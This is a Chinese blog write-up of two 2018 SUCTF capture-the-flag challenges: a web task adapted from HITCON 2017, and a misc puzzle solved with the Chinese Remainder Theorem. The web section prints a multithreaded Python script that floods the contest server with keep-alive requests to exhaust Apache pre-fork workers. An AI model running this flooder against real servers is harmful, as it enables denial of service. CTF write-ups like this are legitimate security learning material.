2018SUCTF部分wp

趁大佬都去打别的比赛，试了试SUCTF，依旧菜的一批，只做出来两道，GG。

WEB:

Anonymous:

简单粗暴给源码，看着这源码好像在哪看过：

没错，2017HITCON改的，只不过难度降低了一大截..把有难度的部分都去掉了。

wp参考这里

按照步骤操作，这道题只需要做最后的步骤，只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧，linux给个命令跑完直接curl:

脚本：

import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass

def run(i):
    while 1:
        HOST='web.suctf.asuri.org'
        PORT=81
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        s.sendall('GET / HTTP/1.1\nHost:web.suctf.asuri.org:81\nConnection: Keep-Alive\n\n')
        # s.close()
        print 'ok'
        time.sleep(0.5)

i = 8
pool = ThreadPool( i )
result = pool.map_async( run,range(i) ).get(0xffff)

出题人还是很良心的...把HITCON原题前面比较难的都省略了...毕竟当时都没有人做出来。

MISC：

sandgame:

题目很明确 就是同余方程组，只是20个同余式联立。考虑中国剩余定理，本来想写个程序，但是感觉太麻烦...(很有可能编不出来) 直接找工具。

Matlab好像没有算同余这种的，转手mathematica,调用ChineseRemainder，游戏结束：

拿到结果转成十六进制进行hex的decode 加上flag{}就是答案。

做出了签到题中的两道，哦不对还有一个真正的签到23333。